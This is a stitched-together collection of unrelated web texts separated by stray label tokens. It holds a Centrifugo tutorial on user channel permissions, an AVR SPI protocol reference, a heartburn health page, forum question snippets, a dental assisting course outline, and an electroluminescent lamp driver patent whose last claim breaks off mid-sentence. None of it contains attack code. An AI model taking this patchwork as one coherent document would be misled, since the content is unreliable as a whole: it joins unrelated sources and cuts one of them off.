Skip to main content 101 ways to subscribe user on a personal channel in Centrifugo · 11 min read Alexander Emelin Centrifuge Let's say you develop an application and want a real-time connection which is subscribed to one channel. Let's also assume that this channel is used for user personal notifications. So only one user in the application can subcribe to that channel to receive its notifications in real-time. In this post we will look at various ways to achieve this with Centrifugo, and consider trade-offs of the available approaches. The main goal of this tutorial is to help Centrifugo newcomers be aware of all the ways to control channel permissions by reading just one document. And... well, there are actually 8 ways I found, not 101 😇 Setup To make the post a bit easier to consume let's setup some things. Let's assume that the user for which we provide all the examples in this post has ID "17". Of course in real-life the examples given here can be extrapolated to any user ID. When you create a real-time connection to Centrifugo the connection is authenticated using the one of the following ways: • using connection JWT • using connection request proxy from Centrifugo to the configured endpoint of the application backend (connect proxy) As soon as the connection is successfully established and authenticated Centrifugo knows the ID of connected user. This is important to understand. And let's define a namespace in Centrifugo configuration which will be used for personal user channels: { ... "namespaces": [ { "name": "personal", "presence": true } ] } Defining namespaces for each new real-time feature is a good practice in Centrifugo. As an awesome improvement we also enabled presence in the personal namespace, so whenever users subscribe to a channel in this namespace Centrifugo will maintain online presence information for each channel. So you can find out all connections of the specific user existing at any moment. Defining presence is fully optional though - turn it of if you don't need presence information and don't want to spend additional server resources on maintaining presence. #1 – user-limited channel tip Probably the most performant approach. All you need to do is to extend namespace configuration with allow_user_limited_channels option: { "namespaces": [ { "name": "personal", "presence": true, "allow_user_limited_channels": true } ] } On the client side you need to have sth like this (of course the ID of current user will be dynamic in real-life): const sub = centrifuge.newSubscription('personal:#17'); sub.on('publication', function(ctx) { console.log(ctx.data); }) sub.subscribe(); Here you are subscribing to a channel in personal namespace and listening to publications coming from a channel. Having # in channel name tells Centrifugo that this is a user-limited channel (because # is a special symbol that is treated in a special way by Centrifugo as soon as allow_user_limited_channels enabled). In this case the user ID part of user-limited channel is "17". So Centrifugo allows user with ID "17" to subscribe on personal:#17 channel. Other users won't be able to subscribe on it. To publish updates to subscription all you need to do is to publish to personal:#17 using server publish API (HTTP or GRPC). #2 - channel token authorization tip Probably the most flexible approach, with reasonably good performance characteristics. Another way we will look at is using subscription JWT for subscribing. When you create Subscription object on the client side you can pass it a subscription token, and also provide a function to retrieve subscription token (useful to automatically handle token refresh, it also handles initial token loading). const token = await getSubscriptionToken('personal:17'); const sub = centrifuge.newSubscription('personal:17', { token: token }); sub.on('publication', function(ctx) { console.log(ctx.data); }) sub.subscribe(); Inside getSubscriptionToken you can issue a request to the backend, for example in browser it's possible to do with fetch API. On the backend side you know the ID of current user due to the native session mechanism of your app, so you can decide whether current user has permission to subsribe on personal:17 or not. If yes – return subscription JWT according to our rules. If not - return empty string so subscription will go to unsubscribed state with unauthorized reason. Here are examples for generating subscription HMAC SHA-256 JWTs for channel personal:17 and HMAC secret key secret: import jwt import time claims = { "sub": "17", "channel": "personal:17" "exp": int(time.time()) + 30*60 } token = jwt.encode(claims, "secret", algorithm="HS256").decode() print(token) Since we set expiration time for subscription JWT tokens we also need to provide a getToken function to a client on the frontend side: const sub = centrifuge.newSubscription('personal:17', { getToken: async function (ctx) { const token = await getSubscriptionToken('personal:17'); return token; } }); sub.on('publication', function(ctx) { console.log(ctx.data); }) sub.subscribe(); This function will be called by SDK automatically to refresh subscription token when it's going to expire. And note that we omitted setting token option here – since SDK is smart enough to call provided getToken function to extract initial subscription token from the backend. The good thing in using subscription JWT approach is that you can provide token expiration time, so permissions to subscribe on a channel will be validated from time to time while connection is active. You can also provide additional channel context info which will be attached to presence information (using info claim of subscription JWT). And you can granularly control channel permissions using allow claim of token – and give client capabilities to publish, call history or presence information (this is Centrifugo PRO feature at this point). Token also allows to override some namespace options on per-subscription basis (with override claim). Using subscription tokens is a general approach for any channels where you need to check access first, not only for personal user channels. #3 - subscribe proxy tip Probably the most secure approach. Subscription JWT gives client a way to subscribe on a channel, and avoid requesting your backend for permission on every resubscribe. Token approach is very good in massive reconnect scenario, when you have many connections and they all resubscribe at once (due to your load balancer reload, for example). But this means that if you unsubscribed client from a channel using server API, client can still resubscribe with token again - until token will expire. In some cases you may want to avoid this. Also, in some cases you want to be notified when someone subscribes to a channel. In this case you may use subscribe proxy feature. When using subscribe proxy every attempt of a client to subscribe on a channel will be translated to request (HTTP or GRPC) from Centrifugo to the application backend. Application backend can decide whether client is allowed to subscribe or not. One advantage of using subscribe proxy is that backend can additionally provide initial channel data for the subscribing client. This is possible using data field of subscribe result generated by backend subscribe handler. { "proxy_subscribe_endpoint": "http://localhost:9000/centrifugo/subscribe", "namespaces": [ { "name": "personal", "presence": true, "proxy_subscribe": true } ] } And on the backend side define a route /centrifugo/subscribe, check permissions of user upon subscription and return result to Centrifugo according to our subscribe proxy docs. Or simply run GRPC server using our proxy definitions and react on subscription attempt sent from Centrifugo to backend over GRPC. On the client-side code is as simple as: const sub = centrifuge.newSubscription('personal:17'); sub.on('publication', function(ctx) { console.log(ctx.data); }) sub.subscribe(); #4 - server-side channel in connection JWT tip The approach where you don't need to manage client-side subscriptions. Server-side subscriptions is a way to consume publications from channels without even create Subscription objects on the client side. In general, client side Subscription objects provide a more flexible and controllable way to work with subscriptions. Clients can subscribe/unsubscribe on channels at any point. Client-side subscriptions provide more details about state transitions. With server-side subscriptions though you are consuming publications directly from Client instance: const client = new Centrifuge('ws://localhost:8000/connection/websocket', { token: 'CONNECTION-JWT' }); client.on('publication', function(ctx) { console.log('publication received from server-side channel', ctx.channel, ctx.data); }); client.connect(); In this case you don't have separate Subscription objects and need to look at ctx.channel upon receiving publication or to publication content to decide how to handle it. Server-side subscriptions could be a good choice if you are using Centrifugo unidirectional transports and don't need dynamic subscribe/unsubscribe behavior. The first way to subscribe client on a server-side channel is to include channels claim into connection JWT: { "sub": "17", "channels": ["personal:17"] } Upon successful connection user will be subscribed to a server-side channel by Centrifugo. One downside of using server-side channels is that errors in one server-side channel (like impossible to recover missed messages) may affect the entire connection and result into reconnects, while with client-side subscriptions individual subsription failures do not affect the entire connection. But having one server-side channel per-connection seems a very reasonable idea to me in many cases. And if you have stable set of subscriptions which do not require lifetime state management – this can be a nice approach without additional protocol/network overhead involved. #5 - server-side channel in connect proxy Similar to the previous one for cases when you are authenticating connections over connect proxy instead of using JWT. This is possible using channels field of connect proxy handler result. The code on the client-side is the same as in Option #4 – since we only change the way how list of server-side channels is provided. #6 - automatic personal channel subscription tip Almost no code approach. As we pointed above Centrifugo knows an ID of the user due to authentication process. So why not combining this knowledge with automatic server-side personal channel subscription? Centrifugo provides exactly this with user personal channel feature. { "user_subscribe_to_personal": true, "user_personal_channel_namespace": "personal", "namespaces": [ { "name": "personal", "presence": true } ] } This feature only subscribes non-anonymous users to personal channels (those with non-empty user ID). The configuration above will subscribe our user "17" to channel personal:#17 automatically after successful authentication. #7 – capabilities in connection JWT Allows using client-side subscriptions, but skip receiving subscription token. This is only available in Centrifugo PRO at this point. So when generating JWT you can provide additional caps claim which contains channel resource capabilities: import jwt import time claims = { "sub": "17", "exp": int(time.time()) + 30*60, "caps": [ { "channels": ["personal:17"], "allow": ["sub"] } ] } token = jwt.encode(claims, "secret", algorithm="HS256").decode() print(token) While in case of single channel the benefit of using this approach is not really obvious, it can help when you are using several channels with stric access permissions per connection, where providing capabilities can help to save some traffic and CPU resources since we avoid generating subscription token for each individual channel. #8 – capabilities in connect proxy This is very similar to the previous approach, but capabilities are passed to Centrifugo in connect proxy result. So if you are using connect proxy for auth then you can still provide capabilities in the same form as in JWT. This is also a Centrifugo PRO feature. Teardown Which way to choose? Well, it depends. Since your application will have more than only a personal user channel in many cases you should decide which approach suits you better in each particular case – it's hard to give the universal advice. Client-side subscriptions are more flexible in general, so I'd suggest using them whenever possible. Though you may use unidirectional transports of Centrifugo where subscribing to channels from the client side is not simple to achieve (though still possible using our server subscribe API). Server-side subscriptions make more sense there. The good news is that all our official bidirectional client SDKs support all the approaches mentioned in this post. Hope designing the channel configuration on top of Centrifugo will be a pleasant experience for you.
__label__pos
0.61658
 Using the SPI protocol Using the SPI protocol Top  Previous  Next General description of the SPI   The SPI allows high-speed synchronous data transfer between the AVR and peripheral devices or between several AVR devices. On most parts the SPI has a second purpose where it is used for In System Programming (ISP).   The interconnection between two SPI devices always happens between a master device and a slave device. Compared to some peripheral devices like sensors which can only run in slave mode, the SPI of the AVR can be configured for both master and slave mode.   The mode the AVR is running in is specified by the settings of the master bit (MSTR) in the SPI control register (SPCR).   Special considerations about the /SS pin have to be taken into account. This will be described later in the section "Multi Slave Systems - /SS pin Functionality".   The master is the active part in this system and has to provide the clock signal a serial data transmission is based on. The slave is not capable of generating the clock signal and thus can not get active on its own.   The slave just sends and receives data if the master generates the necessary clock signal. The master however generates the clock signal only while sending data. That means that the master has to send data to the slave to read data from the slave.   hardware_SPI_mstrslave   Data transmission between Master and Slave   The interaction between a master and a slave AVR is shown in Figure 1. Two identical SPI units are displayed. The left unit is configured as master while the right unit is configured as slave. The MISO, MOSI and SCK lines are connected with the corresponding lines of the other part.   The mode in which a part is running determines if they are input or output signal lines. Because a bit is shifted from the master to the slave and from the slave to the master simultaneously in one clock cycle both 8-bit shift registers can be considered as one 16-bit circular shift register. This means that after eight SCK clock pulses the data between master and slave will be exchanged.   The system is single buffered in the transmit direction and double buffered in the receive direction. This influences the data handling in the following ways:   1. New bytes to be sent can not be written to the data register (SPDR) / shift register before the entire shift cycle is completed. 2. Received bytes are written to the Receive Buffer immediately after the transmission is completed. 3. The Receive Buffer has to be read before the next transmission is completed or data will be lost. 4. Reading the SPDR will return the data of the Receive Buffer.   After a transfer is completed the SPI Interrupt Flag (SPIF) will be set in the SPI Status Register (SPSR). This will cause the corresponding interrupt to be executed if this interrupt and the global interrupts are enabled. Setting the SPI Interrupt Enable (SPIE) bit in the SPCR enables the interrupt of the SPI while setting the I bit in the SREG enables the global interrupts.     Pins of the SPI   The SPI consists of four different signal lines. These lines are the shift clock (SCK), the Master Out Slave In line (MOSI), the Master In Slave Out line (MISO) and the active low Slave Select line (/SS). When the SPI is enabled, the data direction of the MOSI, MISO, SCK and /SS pins are overridden according to the following table.     Table 1. SPI Pin Overrides Pin Direction Overrides Master SPI Mode Direction Overrides Slave SPI Modes MOSI User Defined Input MISO Input User Defined SCK User Defined Input SS User Defined Input     This table shows that just the input pins are automatically configured. The output pins have to be initialized manually by software. The reason for this is to avoid damages e.g. through driver contention.     Multi Slave Systems - /SS pin Functionality The Slave Select (/SS) pin plays a central role in the SPI configuration. Depending on the mode the part is running in and the configuration of this pin, it can be used to activate or deactivate the devices. The /SS pin can be compared with a chip select pin which has some extra features. In master mode, the /SS pin must be held high to ensure master SPI operation if this pin is configured as an input pin. A low level will switch the SPI into slave mode and the hardware of the SPI will perform the following actions:   1. The master bit (MSTR) in the SPI Control Register (SPCR) is cleared and the SPI system becomes a slave. The direction of the pins will be switched according to Table 1.   2. The SPI Interrupt Flag (SPIF) in the SPI Status Register (SPSR) will be set. If the SPI interrupt and the global interrupts are enabled the interrupt routine will be executed. This can be useful in systems with more than one master to avoid that two masters are accessing the SPI bus at the same time. If the /SS pin is configured as output pin it can be used as a general purpose output pin which does not affect the SPI system.     Note: In cases where the AVR is configured for master mode and it can not be ensured that the /SS pin will stay high between two transmissions, the status of the MSTR bit has to be checked before a new byte is written. Once the MSTR bit has been cleared by a low level on the /SS line, it must be set by the application to re-enable SPI master mode.     In slave mode the /SS pin is always an input. When /SS is held low, the SPI is activated and MISO becomes output if configured so by the user. All other pins are inputs. When /SS is driven high, all pins are inputs, and the SPI is passive, which means that it will not receive incoming data.   Table 2 shows an overview of the /SS Pin Functionality.     Note: In slave mode, the SPI logic will be reset once the /SS pin is brought high. If the /SS pin is brought high during a transmission, the SPI will stop sending and receiving immediately and both data received and data sent must be considered as lost.     TABLE 2. Overview of SS pin. Mode /SS Config /SS Pin level Description Slave Always input High Slave deactivated Low Slave activated Master Input High Master activated Low Master deactivated Output High Master activated Low     As shown in Table 2, the /SS pin in slave mode is always an input pin. A low level activates the SPI of the device while a high level causes its deactivation. A Single Master Multiple Slave System with an AVR configured in master mode and /SS configured as output pin is shown in Figure 2. The amount of slaves, which can be connected to this AVR is only limited by the number of I/O pins to generate the slave select signals.     hardware_SPI_multislave   The ability to connect several devices to the same SPI-bus is based on the fact that only one master and only one slave is active at the same time. The MISO, MOSI and SCK lines of all the other slaves are tri stated (configured as input pins of a high impedance with no pull up resistors enabled). A false implementation (e.g. if two slaves are activated at the same time) can cause a driver contention which can lead to a CMOS latch up state and must be avoided. Resistances of 1 to 10 k ohms in series with the pins of the SPI can be used to prevent the system from latching up. However this affects the maximum usable data rate, depending on the loading capacitance on the SPI pins.     Unidirectional SPI devices require just the clock line and one of the data lines. If the device is using the MISO line or the MOSI line depends on its purpose. Simple sensors for instance are just sending data (see S2 in Figure 2), while an external DAC usually just receives data (see S3 in Figure 2).     SPI Timing The SPI has four modes of operation, 0 through 3. These modes essentially control the way data is clocked in or out of an SPI device. The configuration is done by two bits in the SPI control register (SPCR). The clock polarity is specified by the CPOL control bit, which selects an active high or active low clock. The clock phase (CPHA) control bit selects one of the two fundamentally different transfer formats. To ensure a proper communication between master and slave both devices have to run in the same mode. This can require a reconfiguration of the master to match the requirements of different peripheral slaves.   The settings of CPOL and CPHA specify the different SPI modes, shown in Table 3. Because this is no standard and specified different in other literature, the configuration of the SPI has to be done carefully.     Table 3. SPI Mode configuration SPI Mode CPOL CPHA Shift SCK edge Capture SCK edge 0 0 0 Falling Rising 1 0 1 Rising Falling 2 1 0 Rising Falling 3 1 1 Falling Rising     The clock polarity has no significant effect on the transfer format. Switching this bit causes the clock signal to be inverted (active high becomes active low and idle low becomes idle high). The settings of the clock phase, how-ever, selects one of the two different transfer timings, which are described closer in the next two chapters. Since the MOSI and MISO lines of the master and the slave are directly connected to each other, the diagrams show the timing of both devices, master and slave. The /SS line is the slave select input of the slave. The /SS pin of the master is not shown in the diagrams. It has to be inactive by a high level on this pin (if configured as input pin) or by configuring it as an output pin.   A.) CPHA = 0 and CPOL = 0 (Mode 0) and CPHA = 0 and CPOL = 1 (Mode 1)   The timing of a SPI transfer where CPHA is zero is shown in Figure 3. Two wave forms are shown for the SCK signal -one for CPOL equals zero and another for CPOL equals one.   hardware_SPI_CPHA0   When the SPI is configured as a slave, the transmission starts with the falling edge of the /SS line. This activates the SPI of the slave and the MSB of the byte stored in its data register (SPDR) is output on the MISO line. The actual transfer is started by a software write to the SPDR of the master. This causes the clock signal to be generated. In cases where the CPHA equals zero, the SCK signal remains zero for the first half of the first SCK cycle. This ensures that the data is stable on the input lines of both the master and the slave. The data on the input lines is read with the edge of the SCK line from its inactive to its active state (rising edge if CPOL equals zero and falling edge if CPOL equals one). The edge of the SCK line from its active to its inactive state (falling edge if CPOL equals zero and rising edge if CPOL equals one) causes the data to be shifted one bit further so that the next bit is output on the MOSI and MISO lines.   After eight clock pulses the transmission is completed. In both the master and the slave device the SPI interrupt flag (SPIF) is set and the received byte is transferred to the receive buffer.   B.) CPHA = 1 and CPOL = 0 (Mode 2) and CPHA = 1 and CPOL = 1 (Mode 3)   The timing of a SPI transfer where CPHA is one is shown in Figure 4. Two wave forms are shown for the SCK signal -one for CPOL equals zero and another for CPOL equals one.     hardware_SPI_CPHA1   Like in the previous cases the falling edge of the /SS lines selects and activates the slave. Compared to the previous cases, where CPHA equals zero, the transmission is not started and the MSB is not output by the slave at this stage. The actual transfer is started by a software write to the SPDR of the master what causes the clock signal to be generated. The first edge of the SCK signal from its inactive to its active state (rising edge if CPOL equals zero and falling edge if CPOL equals one) causes both the master and the slave to output the MSB of the byte in the SPDR.   As shown in Figure 4, there is no delay of half a SCK-cycle like in Mode 0 and 1. The SCK line changes its level immediately at the beginning of the first SCK-cycle. The data on the input lines is read with the edge of the SCK line from its active to its inactive state (falling edge if CPOL equals zero and rising edge if CPOL equals one).   After eight clock pulses the transmission is completed. In both the master and the slave device the SPI interrupt flag (SPIF) is set and the received byte is transferred to the receive buffer.   Considerations for high speed transmissions   Parts which run at higher system clock frequencies and SPI modules capable of running at speed grades up to half the system clock require a more specific timing to match the needs of both the sender and receiver. The following two diagrams show the timing of the AVR in master and in slave mode for the SPI Modes 0 and 1. The exact values of the displayed times vary between the different pars and are not an issue in this application note. However the functionality of all parts is in principle the same so that the following considerations apply to all parts.   ebx_732972804   The minimum timing of the clock signal is given by the times "1" and "2". The value "1" specifies the SCK period while the value "2" specifies the high / low times of the clock signal. The maximum rise and fall time of the SCK signal is specified by the time "3". These are the first timings of the AVR to check if they match the requirements of the slave.   The Setup time "4" and Hold time "5" are important times because they specify the requirements the AVR has on the interface of the slave. These times determine how long before the clock edge the slave has to have valid output data ready and how long after the clock edge this data has to be valid.   If the Setup and Hold time are long enough the slave suits to the requirements of the AVR but does the AVR suit to the requirements of the slave?   The time "6" (Out to SCK) specifies the minimum time the AVR has valid output data ready before the clock edge occurs. This time can be compared to the Setup time "4" of the slave.   The time "7" (SCK to Out) specifies the maximum time after which the AVR outputs the next data bit while the time "8" (SCK to Out high) the minimum time specifies during which the last data bit is valid on the MOSI line after the SCK was set back to its idle state.   ebx_-87387816   In principle the timings are the same in slave mode like previously described in master mode. Because of the switching of the roles between master and slave the requirements on the timing are inverted as well. The minimum times of the master mode are now maximum times and vice versa.   SPI Transmission Conflicts A write collision occurs if the SPDR is written while a transfer is in progress. Since this register is just single buffered in the transmit direction, writing to SPDR causes data to be written directly into the SPI shift register. Because this write operation would corrupt the data of the current transfer, a write-collision error in generated by setting the WCOL bit in the SPSR. The write operation will not be executed in this case and the transfer continues undisturbed. A write collision is generally a slave error because a slave has no control over when a master will initiate a transfer. A master, however, knows when a transfer is in progress. Thus a master should not generate write collision errors, although the SPI logic can detect these errors in a master as well as in a slave mode.   When you set the SPI option from the Options, Compiler, SPI menu SPCR will be set to 01010100 which means ; enable SPI, master mode, CPOL = 1   When you want to control the various options with the hardware SPI you can use the CONFIG SPI statement.       See also: config SPI, Config SPIx, SPISLAVE, SPIINIT, SPIOUT, SPIIN, Using USI (Universal Serial Interface)
__label__pos
0.625397
We offer limited support for your version of the Internet Explorer browser. You can still use the site and complete a GP consultation, but not everything will work and look great. If you can, try to upgrade to a modern browser Heartburn Call us on 0151 727 5555  Learn more about heartburn: introduction Heartburn is a burning feeling in the chest caused by stomach acid travelling up towards the throat (acid reflux). If it keeps happening, it’s called gastro-oesophageal reflux disease (GORD). Check if you have acid reflux The main symptoms of acid reflux are: • heartburn – a burning sensation in the middle of your chest • an unpleasant sour taste in your mouth, caused by stomach acid You may also have: • a cough or hiccups that keep coming back • a hoarse voice • bad breath • bloating and feeling sick Your symptoms will probably be worse after eating, when lying down and when bending over. Causes of heartburn and acid reflux Lots of people get heartburn from time to time. There's often no obvious reason why. Sometimes it's caused or made worse by: • certain food and drink – such as coffee, alcohol, chocolate, and fatty or spicy foods • being overweight • smoking • pregnancy • stress and anxiety • some medicines, such as anti-inflammatory painkillers (like ibuprofen) • a hiatus hernia – when part of your stomach moves up into your chest How you can ease heartburn and acid reflux yourself Simple lifestyle changes can help stop or reduce heartburn. Do • eat smaller, more frequent meals • raise one end of your bed 10 to 20cm by putting something under your bed or mattress – make it so your chest and head are above the level of your waist, so stomach acid doesn't travel up towards your throat • try to lose weight if you're overweight • try to find ways to relax Don't • have food or drink that triggers your symptoms • eat within 3 or 4 hours before bed • wear clothes that are tight around your waist • smoke • drink too much alcohol • stop taking any prescribed medicine without speaking to a doctor first A pharmacist can help with heartburn and acid reflux Speak to a pharmacist for advice if you keep getting heartburn. They can recommend medicines called antacids that can help ease your symptoms. It's best to take these with food or soon after eating, as this is when you're most likely to get heartburn. They may also work for longer if taken with food. Find a pharmacy See a GP if: • lifestyle changes and pharmacy medicines aren't helping • you have heartburn most days for 3 weeks or more • you have other symptoms, like food getting stuck in your throat, frequently being sick or losing weight for no reason Your GP can provide stronger treatments and help rule out any more serious possible causes of your symptoms. Treatment from your GP To ease your symptoms, your GP may prescribe medicine that reduces how much acid your stomach makes, such as: You may be prescribed one of these medicines for a month or two to see if your symptoms stop. Go back to your GP if your symptoms come back after stopping your medicine. You may need a long-term prescription. Tests and surgery for heartburn and acid reflux If medicines don't help or your symptoms are severe, your GP may refer you to a specialist for: • tests to find out what's causing your symptoms, such as a gastroscopy (where a thin tube with a camera is passed down your throat) • an operation to stop acid reflux – called a laparoscopic fundoplication Content supplied by NHS Choices
__label__pos
0.632925
0 votes 1answer 20 views Filtering the results of a SELECT query to avoid certain words in the value of a column? I have a table called videos with a column named title and there is a set of words (around 50 words as of now but the number of words may increase) which is the knowledge base for filtering the ... 1 vote 1answer 681 views How to change the display of an empty string in mysql command line tool? I'm maintaining a database with InnoDB tables. These tables have some columns of type (from show create table): `val0` varchar(30) default NULL, `val1` varchar(30) default NULL, etc... From the ...
__label__pos
1
Print Version Effective: Summer 2011 D A 62BDENTAL SCIENCES II2 Unit(s) Grade Type: Letter Grade, the student may select Pass/No Pass Not Repeatable. FHGE: Non-GE Transferable: CSU 2 hours lecture. (24 hours total per quarter) Student Learning Outcomes - • The student must be able to identify tooth abnormalities caused by an interruption in the tooth development process. • The student will assess and identify a patient's caries risk and propose a plan to either arrest the patient's caries process or reduce further risk of decay. Description - An overview of the embryologic development of the structures and tissues of the head, neck, teeth and oral cavity, histology of the hard and soft tissues of the oral cavity. Developmental and structural defects involving the oral cavity and the teeth. Periodontal diseases, caries process and oral pathology. Intended for students in the Dental Assisting Program; enrollment is limited to students accepted in the program. Course Objectives - The student will be able to: Dental Assisting Theory & Practice 1. identify the stages of embryologic and fetal development of the head and oral cavity. 2. from a list of the tissues of the head and oral cavity, associate each with the germ layer from which it arises. 3. identify anomalies of the oral structures with failures of development of specific embryologic structures. 4. describe the appearance of/or recognize, specific types of facial and oral developmental anomalites. 5. list and describe common developmental defects involving the teeth. 6. list in order, the stages of tooth development and describe the characteristic activities of each stage. 7. describe general pathology terms. 8. describe different types of pathology found in the oral cavity. 9. list and describe the tools available to identify the presence or absence of oral pathology and the information obtained by the use of each. 10. describe the caries process. 11. describe the AAP types of periodontal diseases and how periodontal disease develops. 12. briefly describe and define the process of inflammation, regeneration, repair and healing. 13. list the most common dental infections and describe their course, treatment, and resolution. Foothill College Dental Assisting Program Competencies 1. Dental Assisting Theory & Practice: dental assisting students must be competent in applying the theory and practice of dental assisting for persons of all ages and abilities. 2. Infection Control and Hazardous Waste Management: dental assistants must possess the knowledge and abilities to prevent the transmission of infectious diseases. 3. Ethical and Legal Principles: dental assisting students must be competent in understanding ethical/legal principles as applied to the dental office. Special Facilities and/or Equipment - None Course Content (Body of knowledge) - Dental Assisting Theory & Practice 1. Stages of embryologic and fetal development of the head and oral cavity. 1. Prenatal development 1. Preimplantation period 2. Embryonic period 3. Fetal period 2. from a list of the tissues of the head and oral cavity, associate each with the germ layer from which it arises. 1. Primary embryonic layers 1. Ectoderm 2. Mesoderm 3. Endoderm 2. Branchial arches 3. Facial development 3. Anomalies of the oral structures due to development 1. Cleft lip 2. Cleft palate 4. Factors associated with facial and oral developmental anomalies. 1. Environmental 2. Genetic 5. Common developmental defects 1. Dens in dente 2. Gemination/Fusion/Concrescence 3. Congenitally missing teeth 4. Amelogenesis imperfecta 5. Dentinogenesis imperfecta 6. Enamel pearl 7. Supernumerary teeth 8. Anodontia/Macrodontia/Microdontia 9. Hutchinson's incisor 10. Hypoplasia 6. Stages of tooth development. 1. Initiation 2. Bud stage 3. Cap stage 4. Bell stage 5. Apposition stage 6. Maturation stage 7. General pathology terms. 1. developmental disturbances and genetic diseases 2. inflammatory and infective disease 3. neoplastic growths 8. Types of pathology 1. developmental defects in oral structures and teeth 2. oral and dental infections 3. caries process 4. periodontal disease 5. oral cysts, benign and malignant tumors 6. oral manifestation of systemic disease 9. Identifying oral pathology 1. health history and oral inspection 2. radiographs 3. oral cytology and biopsy 10. Caries process 1. process of bacterial colonization 2. soft and hard deposits 3. demineralization 11. Periodontal diseases. 1. Gingivitis 2. Periodontitis 1. AAP type 3. Process 4. Prevention 12. Process of healing 1. Inflammation 2. Regeneration 3. Repair 13. Common dental infections and describe their course, treatment, and resolution. 1. Candidiasis 2. Herpes simplex 3. Periapical or periodontal abscesses Methods of Evaluation - 1. Quizzes 2. Midterm 3. Final 4. Assignments Representative Text(s) - Bird, D.L., Robinson, D.S., Modern Dental Assisting, 9th Edition, Philadelphia, PA, Saunders/Elsevier, 2009. Bird, D.L., Robinson, D.S., Workbook to Modern Dental Assisting, 9th Edition, Philadelphia, PA, Saunders/Elsevier, 2009. Miyasaki, C.M., Dental Health Education Syllabus, Revised 2009, Foothill College, Los Altos Hills, CA. OPTIONAL: Supplement (not required) Brand, Richard and Isselhard, Donald, Anatomy of Orofacial Structures, 7th Edition, St. Louis, C.V. Mosby, 2003. Disciplines - Dental Assisting   Method of Instruction - Lecture, Discussion, Demonstration.   Lab Content - Not applicable.   Types and/or Examples of Required Reading, Writing and Outside of Class Assignments - 1. Reading 4 chapters in the textbook. 2. Draw tooth development assignment. 3. Take practice tests in class.
__label__pos
0.999252
Search Images Maps Play YouTube News Gmail Drive More » Sign in Screen reader users: click this link for accessible mode. Accessible mode has the same essential features but works better with your reader. Patents 1. Advanced Patent Search Publication numberUS5677599 A Publication typeGrant Application numberUS 08/613,381 Publication dateOct 14, 1997 Filing dateMar 7, 1996 Priority dateMar 7, 1996 Fee statusPaid Publication number08613381, 613381, US 5677599 A, US 5677599A, US-A-5677599, US5677599 A, US5677599A InventorsGrady McConnell Wood Original AssigneeHarris Corporation Export CitationBiBTeX, EndNote, RefMan External Links: USPTO, USPTO Assignment, Espacenet Circuit for driving an electroluminescent lamp US 5677599 A Abstract A circuit for repeatedly switching current through an inductor for driving an electroluminescent lamp at alternating voltage levels having both peak positive and peak negative polarities. This circuit includes a circuit path having two zener diodes in series connection with the lamp. These zener diodes each have an anode and a cathode, and a breakdown voltage, and may have either their anodes, or cathodes connected together. These zener diodes cause conduction along the circuit path in a first direction when a positive voltage driving the lamp exceeds the breakdown voltage of a first of the two zener diodes to provide a peak detection signal representing that the lamp has reached the peak positive polarity voltage level. Further, these zener diodes cause conduction along the circuit path in a direction opposite the first direction when a negative voltage driving the lamp exceeds the breakdown voltage of a second of the two zener diodes to provide a peak detection signal representing that the lamp has reached the peak negative polarity voltage level. The circuit has a polarity control circuit coupled to the circuit path. This control circuit switches the polarity of the voltage driving the lamp to a negative polarity in response to the positive peak detection signal and switches the polarity of the voltage to the lamp to a positive polarity in response to the negative peak detection signal. Images(2) Previous page Next page Claims(9) I claim: 1. A circuit for repeatedly switching current through an inductor for driving an electroluminescent lamp at alternating voltage levels having both peak positive and peak negative polarities, comprising: a circuit path having two zener diodes in series connection with said lamp, said zener diodes each having anode and cathode terminals, and a breakdown voltage, and said zener diodes having a pair of identical said terminals connected together; said zener diodes causing conduction along the circuit path in a first direction when a positive voltage driving the lamp exceeds the breakdown voltage of a first of said two zener diodes to provide a peak detection signal representing that the lamp has reached the positive peak positive polarity voltage level, and said zener diodes causing conduction along the circuit path in a direction opposite the first direction when a negative voltage driving the lamp exceeds the breakdown voltage of a second of said two zener diodes to provide a negative peak detection signal representing that the lamp has reached the peak negative polarity voltage level; and means, coupled to said circuit path, for switching the polarity of the voltage driving the lamp to a negative polarity in response to the positive peak detection signal, and switching the polarity of the voltage to the lamp to a positive polarity in response to the negative peak detection signal. 2. The circuit according to claim 1 further comprising: a supply terminal; a ground terminal; said inductor having first and second terminals; a first switch coupled between said supply terminal and the first terminal of said inductor, said first switch operating responsive to a first input signal; a second switch coupled between said ground terminal and said second terminal of said inductor, said second switch operating responsive to a second input signal; a third switch coupled between the first terminal of said inductor and the lamp for controlling a first unidirectional current path from said lamp to the first terminal of said inductor responsive to current charging from said inductor along the first path; and a fourth switch coupled between the second terminal of said inductor and the lamp for controlling a second unidirectional current path from said second terminal of the inductor to said lamp responsive to current discharging from said inductor along the second path. 3. The circuit according to claim 2 wherein said means for the switching further comprises: an oscillator providing an output signal; a flip-flop having a first output, a second output opposite said first output, a set input, a reset input, and a triggering circuit for applying a signal to one of the two inputs; said circuit path being connected to said lamp and said input circuit with said two zener diodes between said lamps and input circuit; an AND gate having two inputs and an output signal applied to the first input signal of said first switch, one of said inputs of said AND gate is coupled to the second output of said flip-flop, and the output signal of the oscillator is applied to the other said input of said AND gate; and a NAND logic device having two inputs and an output signal applied to said second input signal of said second switch, one of said inputs of said NAND gate is coupled to the first output of said flip-flop, and the output signal of the oscillator is applied to the other said input of said NAND gate. 4. The circuit according to claim 2 wherein said first switch comprises a PNP transistor having an emitter coupled to said supply terminal, a collector coupled to said first terminal of said inductor, and a base for receiving said first input signal. 5. The circuit according to claim 2 wherein said second switch comprises a NPN transistor having an emitter coupled to said ground terminal, a collector coupled to said second terminal of said inductor, and a base for receiving said second input signal. 6. The circuit according to claim 2 wherein said third and fourth switches comprises auto-triggering SCRs. 7. The circuit according to claim 3 wherein said flip-flop further comprises two cross-coupled transistors coupled to said inputs and said outputs. 8. A circuit for repeatedly switching current through an inductor for driving an electroluminescent lamp at alternating voltage levels having both peak positive and peak negative polarities, comprising: a circuit path having two zener diodes in series connection with said lamp, said zener diodes each having anode and cathode terminals, and a breakdown voltage, and said zener diodes having a pair of identical said terminals connected together; said zener diodes causing conduction along the circuit path in a first direction when a positive voltage driving the lamp exceeds the breakdown voltage of a first of said two zener diodes to provide a peak detection signal representing that the lamp has reached the peak positive polarity voltage level, and said zener diodes causing conduction along the circuit path in a direction opposite the first direction when a negative voltage driving the lamp exceeds the breakdown voltage of a second of said two zener diodes to provide a peak detection signal representing that the lamp has reached the peak negative polarity voltage level; and a polarity control circuit coupled to said zeners for alternately applying driving voltages of opposite polarity to the lamp in response to the peak detection signals. 9. The circuit according to claim 8 wherein said polarity control circuit comprises: a flip-flop for alternately coupling 